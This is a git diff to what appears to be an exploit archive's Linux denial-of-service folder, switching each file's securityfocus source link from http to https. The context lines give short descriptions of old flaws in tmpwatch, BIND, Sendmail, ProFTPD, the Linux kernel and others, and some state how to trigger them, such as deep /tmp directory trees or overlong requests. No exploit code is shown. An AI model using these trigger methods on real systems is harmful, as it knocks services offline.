+++ b/exploits/linux/dos/20217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1664/info +source: https://www.securityfocus.com/bid/1664/info Any user with write access to /tmp or /var/tmp, can induce tmpwatch to cause Red Hat (and others runnng tmpwatch from cron) to stop responding, and possibly require a hard reboot. This is accomplished by creating a directory tree many (ie. ~6000) nodes deep in /tmp. For each level of the directory in /tmp, tmpwatch will fork() a new copy of itself. diff --git a/exploits/linux/dos/20388.txt b/exploits/linux/dos/20388.txt index c8d2c3eb9..e1f3061c5 100644 --- a/exploits/linux/dos/20388.txt +++ b/exploits/linux/dos/20388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1923/info +source: https://www.securityfocus.com/bid/1923/info BIND is the Berkeley Internet Name Daemon, a free Name Resolution software package maintained by the Internet Software Consortium. A Denial of Service exists in current implementations. diff --git a/exploits/linux/dos/20494.pl b/exploits/linux/dos/20494.pl index 5e06d2b88..aad9a99aa 100755 --- a/exploits/linux/dos/20494.pl +++ b/exploits/linux/dos/20494.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2098/info +source: https://www.securityfocus.com/bid/2098/info Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD. diff --git a/exploits/linux/dos/20535.txt b/exploits/linux/dos/20535.txt index 15e3dacd8..e9adefeeb 100644 --- a/exploits/linux/dos/20535.txt +++ b/exploits/linux/dos/20535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2180/info +source: https://www.securityfocus.com/bid/2180/info ReiserFS is a file system alternative to the Linux ext2 file system. It was originally written by Hans Reiser, and is freely available and publicly maintained. diff --git a/exploits/linux/dos/20536.java b/exploits/linux/dos/20536.java index e49dac4aa..5ff1bac8f 100644 
--- a/exploits/linux/dos/20536.java +++ b/exploits/linux/dos/20536.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2185/info +source: https://www.securityfocus.com/bid/2185/info A memory leak has been reported in all versions of ProFTPd. diff --git a/exploits/linux/dos/20561.pl b/exploits/linux/dos/20561.pl index 4ba06d9fa..5b0634b31 100755 --- a/exploits/linux/dos/20561.pl +++ b/exploits/linux/dos/20561.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2237/info +source: https://www.securityfocus.com/bid/2237/info qmail is an e-mail server package developed by Dan Bernstein. diff --git a/exploits/linux/dos/20562.c b/exploits/linux/dos/20562.c index c9e107ff1..d26faec27 100644 --- a/exploits/linux/dos/20562.c +++ b/exploits/linux/dos/20562.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2237/info +// source: https://www.securityfocus.com/bid/2237/info qmail is an e-mail server package developed by Dan Bernstein. diff --git a/exploits/linux/dos/20566.c b/exploits/linux/dos/20566.c index 0333bae6f..9265367eb 100644 --- a/exploits/linux/dos/20566.c +++ b/exploits/linux/dos/20566.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2247/info +source: https://www.securityfocus.com/bid/2247/info Linux kernel versions 2.1.89 to 2.2.3 are vulnerable to a denial of service attack caused when a 0-length IP fragment is received, if it is the first fragment in the list. Several thousands 0-length packets must be sent in order for this to initiate a denial of service against the target. */ diff --git a/exploits/linux/dos/20747.txt b/exploits/linux/dos/20747.txt index e80118008..b2138df67 100644 --- a/exploits/linux/dos/20747.txt +++ b/exploits/linux/dos/20747.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2569/info +source: https://www.securityfocus.com/bid/2569/info The shared library 'ndwfn4.so' that ships with Oracle Application Server is vulnerable to a buffer overflow. The library is used to handle web requests passed to it by the iPlanet web server. If the library is sent a request longer than approximately 2050 characters, it will overflow. diff --git a/exploits/linux/dos/20750.txt b/exploits/linux/dos/20750.txt index 38c0c6cbd..d77f7772f 100644 --- a/exploits/linux/dos/20750.txt +++ b/exploits/linux/dos/20750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2579/info +source: https://www.securityfocus.com/bid/2579/info Interscan Viruswall is a Virus scanning software package distributed and maintained by Trend Micro. It is designed to scan for virus occurances in both incoming and outgoing traffic via SMTP, FTP, and HTTP at the gateway of the network. diff --git a/exploits/linux/dos/20952.c b/exploits/linux/dos/20952.c index 71e849b74..ff28e6d32 100644 --- a/exploits/linux/dos/20952.c +++ b/exploits/linux/dos/20952.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2908/info +// source: https://www.securityfocus.com/bid/2908/info eXtremail is a freeware SMTP server available for Linux and AIX. diff --git a/exploits/linux/dos/21122.sh b/exploits/linux/dos/21122.sh index d3437d367..c367fa237 100755 --- a/exploits/linux/dos/21122.sh +++ b/exploits/linux/dos/21122.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3444/info +source: https://www.securityfocus.com/bid/3444/info A denial-of-service vulnerability exists in several versions of the Linux kernel. diff --git a/exploits/linux/dos/21141.txt b/exploits/linux/dos/21141.txt index 2d560075c..748376879 100644 --- a/exploits/linux/dos/21141.txt +++ b/exploits/linux/dos/21141.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3506/info +source: https://www.securityfocus.com/bid/3506/info TUX is a kernel based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content. diff --git a/exploits/linux/dos/21202.txt b/exploits/linux/dos/21202.txt index 20223d244..255d3bb38 100644 --- a/exploits/linux/dos/21202.txt +++ b/exploits/linux/dos/21202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3782/info +source: https://www.securityfocus.com/bid/3782/info Anti-Web HTTPD is a freely available, open source web server designed for use on the Linux platform. It is maintained by Doug Hoyte. diff --git a/exploits/linux/dos/21262.txt b/exploits/linux/dos/21262.txt index 9f05fe7de..24c6e63c9 100644 --- a/exploits/linux/dos/21262.txt +++ b/exploits/linux/dos/21262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4018/info +source: https://www.securityfocus.com/bid/4018/info kicq 2.0.0b1 is an ICQ client for the K Desktop Environment (KDE). kicq can be crashed remotely by initiating a telnet connection to a port it is listening on and sending "random" characters. This does not affect other components of the system, only the ICQ client. diff --git a/exploits/linux/dos/21338.pl b/exploits/linux/dos/21338.pl index 1794715ad..beddfd976 100755 --- a/exploits/linux/dos/21338.pl +++ b/exploits/linux/dos/21338.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4260/info +source: https://www.securityfocus.com/bid/4260/info XTux is a multiplayer network game for Linux. The server component (June 01, 2001 version) is vulnerable to a denial of service initiated by connecting to the server and sending unexpected characters. This causes the server to become unresponsive and consume resources. diff --git a/exploits/linux/dos/21476.c b/exploits/linux/dos/21476.c index 985e16053..e2ba7e6d2 100644 
--- a/exploits/linux/dos/21476.c +++ b/exploits/linux/dos/21476.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4822/info +source: https://www.securityfocus.com/bid/4822/info Sendmail is a MTA for Unix and Linux variants. diff --git a/exploits/linux/dos/21477.c b/exploits/linux/dos/21477.c index e7bb1d85d..4bad0c181 100644 --- a/exploits/linux/dos/21477.c +++ b/exploits/linux/dos/21477.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4822/info +// source: https://www.securityfocus.com/bid/4822/info Sendmail is a MTA for Unix and Linux variants. diff --git a/exploits/linux/dos/21482.txt b/exploits/linux/dos/21482.txt index 44919b5fc..6be03f654 100644 --- a/exploits/linux/dos/21482.txt +++ b/exploits/linux/dos/21482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4828/info +source: https://www.securityfocus.com/bid/4828/info The PGP Public Key Server is a freely available, open source software package distributed by MIT. It is designed for use on Linux and Unix operating systems. diff --git a/exploits/linux/dos/21518.txt b/exploits/linux/dos/21518.txt index 452250d4e..fdda7e803 100644 --- a/exploits/linux/dos/21518.txt +++ b/exploits/linux/dos/21518.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4966/info +source: https://www.securityfocus.com/bid/4966/info X Window System behaves unpredictably when handling an overly large font size. If an attacker can pass an overly large font size to X Window System, it is possible to cause a denial of service condition. diff --git a/exploits/linux/dos/21534.jsp b/exploits/linux/dos/21534.jsp index 6818f7517..4c338443c 100644 --- a/exploits/linux/dos/21534.jsp +++ b/exploits/linux/dos/21534.jsp 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4995/info +source: https://www.securityfocus.com/bid/4995/info A vulnerability has been reported in Apache Tomcat for Windows that results in a denial of service condition. The vulnerability occurs when Tomcat encounters a malicious JSP page. diff --git a/exploits/linux/dos/21537.c b/exploits/linux/dos/21537.c index 8878f8a97..1f777449c 100644 --- a/exploits/linux/dos/21537.c +++ b/exploits/linux/dos/21537.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4998/info +// source: https://www.securityfocus.com/bid/4998/info IRCIT is a terminal based IRC client for Linux and Unix systems. diff --git a/exploits/linux/dos/21580.txt b/exploits/linux/dos/21580.txt index 9a75688ca..af32515ce 100644 --- a/exploits/linux/dos/21580.txt +++ b/exploits/linux/dos/21580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5098/info +source: https://www.securityfocus.com/bid/5098/info Inktomi Traffic Server is a transparent web caching application. It is designed for use with Unix and Linux variants as well as Microsoft Windows operating environments. diff --git a/exploits/linux/dos/21598.c b/exploits/linux/dos/21598.c index 9aa9bc08f..1f05f3bff 100644 --- a/exploits/linux/dos/21598.c +++ b/exploits/linux/dos/21598.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5178/info +source: https://www.securityfocus.com/bid/5178/info The Linux kernel is a freely available, open source kernel originally written by Linus Torvalds. It is the core of all Linux distributions. diff --git a/exploits/linux/dos/21775.c b/exploits/linux/dos/21775.c index ae252f7d6..f35eebcc7 100644 --- a/exploits/linux/dos/21775.c +++ b/exploits/linux/dos/21775.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5664/info +// source: https://www.securityfocus.com/bid/5664/info SWS Simple Web Server is prone to a denial of service when requests not ending with a newline are received. 
diff --git a/exploits/linux/dos/21854.c b/exploits/linux/dos/21854.c index 8e9d0b264..1b2852493 100644 --- a/exploits/linux/dos/21854.c +++ b/exploits/linux/dos/21854.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5787/info +// source: https://www.securityfocus.com/bid/5787/info Apache is prone to a denial of service condition when an excessive amount of data is written to stderr. This condition reportedly occurs when the amount of data written to stderr is over the default amount allowed by the operating system. diff --git a/exploits/linux/dos/21985.txt b/exploits/linux/dos/21985.txt index c33103c19..ce617928f 100644 --- a/exploits/linux/dos/21985.txt +++ b/exploits/linux/dos/21985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6120/info +source: https://www.securityfocus.com/bid/6120/info A heap corruption may occur when Pine receives an email message containing a particularly crafted "From:" address. Though the address is RFC compliant, Pine reportedly fails to parse it correctly, resulting in a core dump. Execution of arbitrary code may be possible. diff --git a/exploits/linux/dos/22011.c b/exploits/linux/dos/22011.c index c288681d3..fdc2d9d1f 100644 --- a/exploits/linux/dos/22011.c +++ b/exploits/linux/dos/22011.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6161/info +// source: https://www.securityfocus.com/bid/6161/info ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a non-existant sub-domain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail. diff --git a/exploits/linux/dos/22033.txt b/exploits/linux/dos/22033.txt index 4e73ab252..f480a76cf 100644 --- a/exploits/linux/dos/22033.txt +++ b/exploits/linux/dos/22033.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6239/info +source: https://www.securityfocus.com/bid/6239/info Several buffer overflow conditions have been reported for WSMP3. The vulnerability is due to improper bounds checking when copying data to local buffers. diff --git a/exploits/linux/dos/22056.txt b/exploits/linux/dos/22056.txt index 8b921cf1c..c2383a982 100644 --- a/exploits/linux/dos/22056.txt +++ b/exploits/linux/dos/22056.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6285/info +source: https://www.securityfocus.com/bid/6285/info A buffer overflow vulnerability has been reported in Pserv. The buffer overflow condition is due to the way Pserv handles data streams from remote connections. diff --git a/exploits/linux/dos/22059.pl b/exploits/linux/dos/22059.pl index 386dc5cfa..ca57938ac 100755 --- a/exploits/linux/dos/22059.pl +++ b/exploits/linux/dos/22059.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6287/info +source: https://www.securityfocus.com/bid/6287/info A buffer overflow vulnerability has been reported in Pserv. The buffer overflow condition is due to the way Pserv handles data streams from remote connections. diff --git a/exploits/linux/dos/22061.txt b/exploits/linux/dos/22061.txt index b8caa1850..ea5e1a22a 100644 --- a/exploits/linux/dos/22061.txt +++ b/exploits/linux/dos/22061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6298/info +source: https://www.securityfocus.com/bid/6298/info Cyrus IMAPD is a freely available, open source Interactive Mail Access Protocol (IMAP) daemon. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/dos/22079.sh b/exploits/linux/dos/22079.sh index b7ff23061..a16bef4cc 100755 --- a/exploits/linux/dos/22079.sh +++ b/exploits/linux/dos/22079.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6341/info +source: https://www.securityfocus.com/bid/6341/info A denial of service vulnerability has been reported for ProFTPD. It is possible to cause ProFTPD from responding to legitimate requests for service by issuing specially crafted STAT commands. This will result in a denial of service condition. diff --git a/exploits/linux/dos/22105.c b/exploits/linux/dos/22105.c index 364c73891..3fceb6411 100644 --- a/exploits/linux/dos/22105.c +++ b/exploits/linux/dos/22105.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/6420/info +source: https://www.securityfocus.com/bid/6420/info A denial of service vulnerability has been discovered in the Linux 2.2 kernel. It has been reported that it is possible for an unprivileged user to cause the kernel to stop responding due to a bug in the implementation of mmap(). diff --git a/exploits/linux/dos/22183.c b/exploits/linux/dos/22183.c index 84f32f9fc..1222ecc55 100644 --- a/exploits/linux/dos/22183.c +++ b/exploits/linux/dos/22183.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6636/info +// source: https://www.securityfocus.com/bid/6636/info A vulnerability has been reported for several games that support the use of the GameSpy network. diff --git a/exploits/linux/dos/22191.pl b/exploits/linux/dos/22191.pl index e713705bd..f7bd7bbf6 100755 --- a/exploits/linux/dos/22191.pl +++ b/exploits/linux/dos/22191.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6662/info +source: https://www.securityfocus.com/bid/6662/info A vulnerability has been reported in Apache Web server for Microsoft Windows. The vulnerability exists in the way some HTTP requests are handled by the Apache Web server. Specifically, HTTP GET requests that involve reserved MS-DOS device names may cause the Apache Web server to crash. diff --git a/exploits/linux/dos/22197.txt b/exploits/linux/dos/22197.txt index d588a45ad..ecb8428c7 100644 --- a/exploits/linux/dos/22197.txt 
+++ b/exploits/linux/dos/22197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6676/info +source: https://www.securityfocus.com/bid/6676/info A vulnerability has been discovered in slocate. It has been reported that a buffer overrun occurs when running the slocate program with command line arguments of excessive length. Specifically, it is possible to overrun a buffer in slocate by supplying excessive data as the regex ('-r') and parse /etc/updatedb.conf ('-c') command line options. diff --git a/exploits/linux/dos/22243.txt b/exploits/linux/dos/22243.txt index b76a32ece..391086f78 100644 --- a/exploits/linux/dos/22243.txt +++ b/exploits/linux/dos/22243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6822/info +source: https://www.securityfocus.com/bid/6822/info A buffer overflow vulnerability has been reported for FAR that may result in a denial of service condition. The vulnerability exists due to insufficient bounds checking performed by FAR when parsing directory paths. Specifically, when FAR attempts to parse overly long paths it will crash thereby resulting in a denial of service condition. diff --git a/exploits/linux/dos/22259.c b/exploits/linux/dos/22259.c index 50910e335..52f19b414 100644 --- a/exploits/linux/dos/22259.c +++ b/exploits/linux/dos/22259.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6880/info +// source: https://www.securityfocus.com/bid/6880/info It has been reported that BitchX does not properly handle some types of replies contained in the RPL_NAMREPLY numeric. When a malformed reply is received by the client, the client crashes, resulting in a denial of service. diff --git a/exploits/linux/dos/22273.c b/exploits/linux/dos/22273.c index 078f3ffbd..d57ebe6a2 100644 --- a/exploits/linux/dos/22273.c +++ b/exploits/linux/dos/22273.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6913/info +// source: https://www.securityfocus.com/bid/6913/info A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function. diff --git a/exploits/linux/dos/22294.c b/exploits/linux/dos/22294.c index 5f2484f06..886723396 100644 --- a/exploits/linux/dos/22294.c +++ b/exploits/linux/dos/22294.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6974/info +// source: https://www.securityfocus.com/bid/6974/info It has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted. diff --git a/exploits/linux/dos/22352.txt b/exploits/linux/dos/22352.txt index 81ffbb6ec..8867ccc37 100644 --- a/exploits/linux/dos/22352.txt +++ b/exploits/linux/dos/22352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7090/info +source: https://www.securityfocus.com/bid/7090/info It has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted. diff --git a/exploits/linux/dos/22370.txt b/exploits/linux/dos/22370.txt index ad94b261d..cacb8f212 100644 --- a/exploits/linux/dos/22370.txt +++ b/exploits/linux/dos/22370.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7118/info +source: https://www.securityfocus.com/bid/7118/info A vulnerability has been discovered in the Ximian Evolution Mail User Agent (MUA). The problem occurs when the mailer attempts to process a maliciously encoded e-mail message. When attempting to decode the message, the MUA will repeatedly attempt to allocate memory, resulting in system resource exhaustion and will eventually crash. diff --git a/exploits/linux/dos/22433.pl b/exploits/linux/dos/22433.pl index e3573ecf8..a17c2fd19 100755 --- a/exploits/linux/dos/22433.pl +++ b/exploits/linux/dos/22433.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7202/info +source: https://www.securityfocus.com/bid/7202/info Monkey HTTP Daemon is prone to a boundary condition error. This condition occurs when the server attempts to handle excessive HTTP POST data. Exploitation could allow a remote attacker to corrupt sensitive regions of memory with attacker-supplied values, resulting in code execution. Exploitation attempts may also result in a denial of service. diff --git a/exploits/linux/dos/22446.txt b/exploits/linux/dos/22446.txt index a7917b466..982c8bac3 100644 --- a/exploits/linux/dos/22446.txt +++ b/exploits/linux/dos/22446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7243/info +source: https://www.securityfocus.com/bid/7243/info It has been reported that the EZ Server software does not sufficiently handle strings of excessive length in some circumstances. Because of this, a remote attacker may be able to deny service to legitimate users of the system. diff --git a/exploits/linux/dos/22508.sh b/exploits/linux/dos/22508.sh index 9e1360afe..62a757369 100755 --- a/exploits/linux/dos/22508.sh +++ b/exploits/linux/dos/22508.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7382/info +source: https://www.securityfocus.com/bid/7382/info A denial of service vulnerability has been reported for Xinetd. The vulnerability exists due to memory leaks occuring when connections are rejected. diff --git a/exploits/linux/dos/22527.c b/exploits/linux/dos/22527.c index 9703f886b..eaa6a570a 100644 --- a/exploits/linux/dos/22527.c +++ b/exploits/linux/dos/22527.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7410/info +source: https://www.securityfocus.com/bid/7410/info Xeneo web server has been reported prone to an undisclosed buffer overflow vulnerability. diff --git a/exploits/linux/dos/22537.c b/exploits/linux/dos/22537.c index 248efe037..bbc3ebd3f 100644 --- a/exploits/linux/dos/22537.c +++ b/exploits/linux/dos/22537.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7433/info +source: https://www.securityfocus.com/bid/7433/info Libopt library has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/dos/22560.txt b/exploits/linux/dos/22560.txt index 2254f4553..cd26b9717 100644 --- a/exploits/linux/dos/22560.txt +++ b/exploits/linux/dos/22560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7486/info +source: https://www.securityfocus.com/bid/7486/info KDE Konqueror has been reported prone to a denial of service vulnerability when rendering a HTML page that contains malformed data. diff --git a/exploits/linux/dos/22619.txt b/exploits/linux/dos/22619.txt index 7f5459cbd..ecf08f0ed 100644 --- a/exploits/linux/dos/22619.txt +++ b/exploits/linux/dos/22619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7637/info +source: https://www.securityfocus.com/bid/7637/info The cupsd has been reported prone to a denial of service vulnerability. diff --git a/exploits/linux/dos/22624.c b/exploits/linux/dos/22624.c index 2cd08585b..1914cd5bb 100644 --- a/exploits/linux/dos/22624.c +++ b/exploits/linux/dos/22624.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7649/info +// source: https://www.securityfocus.com/bid/7649/info BZFlag is prone to a denial of service vulnerability. Users that have established a session with BZFlag may cause a denial of service by reconnecting and flooding BZFlag ports with excessive amounts of data. diff --git a/exploits/linux/dos/22700.c b/exploits/linux/dos/22700.c index 4c2946c51..783cf8cbf 100644 --- a/exploits/linux/dos/22700.c +++ b/exploits/linux/dos/22700.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7770/info +// source: https://www.securityfocus.com/bid/7770/info myServer has been reported prone to a remote buffer overflow vulnerability. The vulnerability exists when the web server attempts to process HTTP GET requests of excessive length. diff --git a/exploits/linux/dos/22701.c b/exploits/linux/dos/22701.c index fc2d2d314..f589bc476 100644 --- a/exploits/linux/dos/22701.c +++ b/exploits/linux/dos/22701.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7770/info +// source: https://www.securityfocus.com/bid/7770/info myServer has been reported prone to a remote buffer overflow vulnerability. The vulnerability exists when the web server attempts to process HTTP GET requests of excessive length. diff --git a/exploits/linux/dos/22796.php b/exploits/linux/dos/22796.php index 85519918b..ea4753437 100644 --- a/exploits/linux/dos/22796.php +++ b/exploits/linux/dos/22796.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7956/info +source: https://www.securityfocus.com/bid/7956/info It has been reported that MidHosting FTP Daemon does not properly implement shared memory when the m flag (-m) is enabled. Because of this, an attacker could corrupt process memory, causing the service to crash. diff --git a/exploits/linux/dos/22800.txt b/exploits/linux/dos/22800.txt index f2cdcb295..90583b0e4 100644 --- a/exploits/linux/dos/22800.txt +++ b/exploits/linux/dos/22800.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7967/info +source: https://www.securityfocus.com/bid/7967/info Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures. diff --git a/exploits/linux/dos/22801.txt b/exploits/linux/dos/22801.txt index 910cd8aeb..ab32b129c 100644 --- a/exploits/linux/dos/22801.txt +++ b/exploits/linux/dos/22801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7967/info +source: https://www.securityfocus.com/bid/7967/info Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures. diff --git a/exploits/linux/dos/22802.txt b/exploits/linux/dos/22802.txt index 177d9e92d..210580b6f 100644 --- a/exploits/linux/dos/22802.txt +++ b/exploits/linux/dos/22802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7967/info +source: https://www.securityfocus.com/bid/7967/info Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures. diff --git a/exploits/linux/dos/22803.txt b/exploits/linux/dos/22803.txt index 6b6c8fffc..f63a3ad59 100644 
--- a/exploits/linux/dos/22803.txt +++ b/exploits/linux/dos/22803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7967/info +source: https://www.securityfocus.com/bid/7967/info Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures. diff --git a/exploits/linux/dos/22814.txt b/exploits/linux/dos/22814.txt index fe364446f..3e365e22d 100644 --- a/exploits/linux/dos/22814.txt +++ b/exploits/linux/dos/22814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8003/info +source: https://www.securityfocus.com/bid/8003/info A heap overflow vulnerability has been reported for the pr-edit utility of GNATS. The vulnerability occurs due to insufficient checks performed on the arguments to the '-d' commandline option. diff --git a/exploits/linux/dos/22839.c b/exploits/linux/dos/22839.c index 30f7718e2..e9e752f8b 100644 --- a/exploits/linux/dos/22839.c +++ b/exploits/linux/dos/22839.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8038/info +// source: https://www.securityfocus.com/bid/8038/info Behamut IRCd has been reported prone to remotely exploitable format string vulnerability. diff --git a/exploits/linux/dos/22846.pl b/exploits/linux/dos/22846.pl index 91ed929e4..d05c580e3 100755 --- a/exploits/linux/dos/22846.pl +++ b/exploits/linux/dos/22846.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8069/info +source: https://www.securityfocus.com/bid/8069/info An individual has reported that Adobe Acrobat Reader for Unix systems is vulnerable to a buffer overflow condition. The error is allegedly related to the processing of hyperlinks, in the function "WWWLaunchNetscape". The flaw is triggered only when Netscape is set as the browser to be used in the preferences (this is the default configuration). This vulnerability may be exploited through maliciously constructed PDF files. diff --git a/exploits/linux/dos/22897.c b/exploits/linux/dos/22897.c index 6757253e8..5e404fd6a 100644 --- a/exploits/linux/dos/22897.c +++ b/exploits/linux/dos/22897.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8181/info +// source: https://www.securityfocus.com/bid/8181/info It has been reported that Twilight WebServer may be prone to a remote buffer overflow vulnerability. The problem may be present due to a lack of bounds checking performed on incoming GET requests. Arbitrary code execution may be possible. diff --git a/exploits/linux/dos/22952.txt b/exploits/linux/dos/22952.txt index 384666074..3072e59ac 100644 --- a/exploits/linux/dos/22952.txt +++ b/exploits/linux/dos/22952.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8255/info +source: https://www.securityfocus.com/bid/8255/info xfstt is reported to be prone to an unspecified memory disclosure vulnerability. This issue can be triggered by remote attackers to cause a denial of service. The server may also return details about the memory layout of the underlying system when this issue is triggered. diff --git a/exploits/linux/dos/22981.c b/exploits/linux/dos/22981.c index 1ac8d9e7e..da75b4a64 100644 --- a/exploits/linux/dos/22981.c +++ b/exploits/linux/dos/22981.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8333/info +// source: https://www.securityfocus.com/bid/8333/info Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host. diff --git a/exploits/linux/dos/22982.pl b/exploits/linux/dos/22982.pl index b42e892cb..cd6ee439d 100755 --- a/exploits/linux/dos/22982.pl +++ b/exploits/linux/dos/22982.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8333/info +source: https://www.securityfocus.com/bid/8333/info Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host. diff --git a/exploits/linux/dos/23048.txt b/exploits/linux/dos/23048.txt index 4f512c2ad..59b5802ca 100644 --- a/exploits/linux/dos/23048.txt +++ b/exploits/linux/dos/23048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8466/info +source: https://www.securityfocus.com/bid/8466/info A vulnerability has been reported in srcpd that allows a remote attacker to cause a denial of service by exploiting an integer overflow error. The exploitation of this problem would consist of an attacker connecting to a server and issuing the "go" command with a large integer value, causing an overflow condition. diff --git a/exploits/linux/dos/23112.txt b/exploits/linux/dos/23112.txt index ce6276fd8..18b11cd16 100644 
